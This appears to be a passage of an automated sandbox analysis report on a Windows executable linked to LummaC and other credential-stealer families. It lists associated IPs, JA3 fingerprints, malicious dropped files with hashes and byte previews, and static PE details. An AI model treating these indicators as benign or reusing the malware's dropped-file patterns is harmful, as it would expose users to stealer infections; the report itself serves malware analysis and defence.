                                                                                                                                                                                                                                                                    wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                    • 104.20.22.46
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.79.7
                                                                                                                                                                                                                                                                    CLOUDFLARENETUSYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.64.1
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 172.67.164.37
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                                    • 104.20.22.46
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.79.7

                                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    • 104.21.16.1
                                                                                                                                                                                                                                                                    • 172.67.207.38
                                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    build.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70

                                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\86DC.tmp.exerHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                          QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exerHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_86DC.tmp.exe_d89cef514dbaf856be14156cefff92a0e39d5d54_9794c99d_9ceca294-b671-4cdd-8bf9-abd3976354e6\Report.wer

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.9576674386021528
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:/CAFqFxsjh4BB74sfYQXIDcQLc6NcEwcw3eGY+HbHg/8BRTf3Oy1E45WAU6NCUtI:vQFxJ0M0lJaNju3RzuiFRZ24IO8s
                                                                                                                                                                                                                                                                                    MD5:6305922D5332F3C56D99F38ED122915C
                                                                                                                                                                                                                                                                                    SHA1:703D7B35F60B52B25B466E182C70D53AAD36A739
                                                                                                                                                                                                                                                                                    SHA-256:C78334E000B72B32079FEE1A9D82B32F11286EC6A2ED0A535718C7DB50E274E1
                                                                                                                                                                                                                                                                                    SHA-512:419BAAEBC512DFCA9F9307DDAE4DA6FEC29571D51E7EC70F5E203F5E0704641478681D9F3440055E1FD4E9B70965B585F2DF4B0F432F49CA15285A92BE2232E1
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.7.2.4.4.3.8.4.6.9.8.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.7.2.4.4.3.8.8.9.1.7.3.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.e.c.a.2.9.4.-.b.6.7.1.-.4.c.d.d.-.8.b.f.9.-.a.b.d.3.9.7.6.3.5.4.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.8.5.c.1.2.9.-.0.c.5.d.-.4.f.2.d.-.b.3.b.8.-.5.3.5.5.4.3.0.e.0.6.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.6.D.C...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.c.-.0.0.0.1.-.0.0.1.4.-.4.0.4.3.-.9.b.3.1.c.a.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.f.6.3.7.e.f.2.7.3.a.1.c.a.b.6.9.4.5.c.4.3.c.e.2.b.e.9.e.4.8.4.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.8.6.D.C...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B50.tmp.dmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sun Dec 15 08:20:38 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):46046
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.5655370660130896
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:17TXcaEuXYIfXOx1BEjD+A2XNvuZdTLL4uWIeBgMnSmH8vyb7:qaEuXY/TBEj/ycMYIgMSmH86n
                                                                                                                                                                                                                                                                                    MD5:3FD50D802E5A5942BBCE1DE804FD59DC
                                                                                                                                                                                                                                                                                    SHA1:8C4A5D4B3386C0930FC629FA346B1E9FC82471D7
                                                                                                                                                                                                                                                                                    SHA-256:D455B877BEE6E6F5378C1A5B30B8AFFEF3ACA543228ADC334B0A1D0492D59DE2
                                                                                                                                                                                                                                                                                    SHA-512:3A0ACB3E27F5AB533663ECC325D3846716B59590F4EC80BF795DDDA3859197AF6148DB014417A37F8CCF46EA0A7F8E437B0F52C50BB2B03C9FEB5AD757174F36
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:MDMP..a..... .......V.^g............4...............H...........<.......t....-..........`.......8...........T............@...s......................................................................................................eJ....... ......GenuineIntel............T...........J.^g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C1D.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8286
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6989328271515465
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJ8E6fOI6YGv6fTgmf5MsppDG89b4/sf0/Im:R6lXJH6J6YW6bgmfzj4kf0V
                                                                                                                                                                                                                                                                                    MD5:CA4B3110759B9FA351A68F2006D35B4A
                                                                                                                                                                                                                                                                                    SHA1:F3DC499936945D6FE4F7D444D5435C75893FC58A
                                                                                                                                                                                                                                                                                    SHA-256:452B043E5ABE74CECA4B192B8E3FEFD9E2D6237977597A0D3DB2BC0BE5B45D47
                                                                                                                                                                                                                                                                                    SHA-512:645EC60A7DFAE13198CD4940C45F59214FC5DA72D09819DE4ED30D787A85E6CB2889DA91652B22F01135C42266A8A49F62584C2F27CA95D6E69BA9CD68A04D5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.6.8.<./.P.i.

                                                                                                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C3D.tmp.xml

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4565
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451355962757731
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zszJg77aI9kHWpW8VYGYm8M4Jb9WeFTI+q8sCCunxHzHAd:uIjfNI7a27VuJXI2nxHzHAd
                                                                                                                                                                                                                                                                                    MD5:1EA9817BDFB7A5A4754B4EF9AE5EF1F6
                                                                                                                                                                                                                                                                                    SHA1:5635B99595751D3BCCB833E90CDE3F010AE195C0
                                                                                                                                                                                                                                                                                    SHA-256:4D0E79633571ACC18FBDCD98F1CC7BCA4552CB848CE6A1D2DD47B5ABB41F4127
                                                                                                                                                                                                                                                                                    SHA-512:73CC56BB5362D2F9AE869C82D371B18D8DDF440C4D6589136D7E5A2A5BC7884F72331379AA6DDA1681977CA477D2AD48E7B60D0501B9CE52013DCBAB55B7CA31
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="632123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):361984
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                                    MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                                    SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                                    SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                                    SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                    • Filename: rHrG691f7q.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\86DC.tmp.exe

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):361984
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.633746849794654
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
                                                                                                                                                                                                                                                                                    MD5:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                                    SHA1:4A2095690BA8F1325DD10167318728447D12058A
                                                                                                                                                                                                                                                                                    SHA-256:4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                                                                                                                                                                                                                                                                                    SHA-512:7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                    • Filename: rHrG691f7q.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: TN78WX7nJU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: XIaCqh1vRm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.372090955571479
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:QFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNziL:IV1QyWWI/glMM6kF7xq
                                                                                                                                                                                                                                                                                    MD5:2ED8D36EFC21BE8F53E3D70F28492584
                                                                                                                                                                                                                                                                                    SHA1:F2A081D3C92F8A41EE6DBE1E05F0950632499D34
                                                                                                                                                                                                                                                                                    SHA-256:CBF043AF06CCFAE56A00A381C2742B14A140D0ECDE57908034EA88EF1272E1E4
                                                                                                                                                                                                                                                                                    SHA-512:472F4E8F6BB5C8802EC4FD54F80AEB2AAAD01CC4AFAF3FF84571ECEC8BF780EA9FA92696D67286F79E1C4DC66E409F0CF5397D327B29CB7D7967F3B99B83F389
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..8.N..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.9956521780967105
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    File size:429'056 bytes
                                                                                                                                                                                                                                                                                    MD5:7c13e0cbd1513abe7f2d2d73cc0ad615
                                                                                                                                                                                                                                                                                    SHA1:375062b73661432e50e66cf08557ff3b737c8914
                                                                                                                                                                                                                                                                                    SHA256:979cfe34baa41bc1556c9349402ced4242d6a7b3f0197d9e07643caa363daa93
                                                                                                                                                                                                                                                                                    SHA512:5cb2656d377b821f48f22651ce1af1fb3fb8691b9abf664035b167541ff3ce9c4abe59d862bfdfa3f2165863a4444c4b701f9c3c3e1ecbb2cc64606b167eb771
                                                                                                                                                                                                                                                                                    SSDEEP:6144:1V+A7dY8rh7851/SGh75bqrjQE5lmOYbD8mwdVZzaiKPVYfpU:1V+A7dGUGWQVrDudVciUQpU
                                                                                                                                                                                                                                                                                    TLSH:7394E05076EDC832E2FB8A305D35D7942A3BF5A36A71928F36642A5F0E712D1C972703
                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L...m.of...........

                                                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                                                    Icon Hash:46c7c30b0f4e8d59

                                                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Entrypoint:0x40185c
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x666FF66D [Mon Jun 17 08:40:13 2024 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:2e0d489727c83968a7eef10b14f239ec

                                                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    call 00007FCD88C62976h
                                                                                                                                                                                                                                                                                    jmp 00007FCD88C5EFFDh
                                                                                                                                                                                                                                                                                    mov edi, edi
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                                                    sub esp, 00000328h
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C18h], eax
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C14h], ecx
                                                                                                                                                                                                                                                                                    mov dword ptr [00456C10h], edx
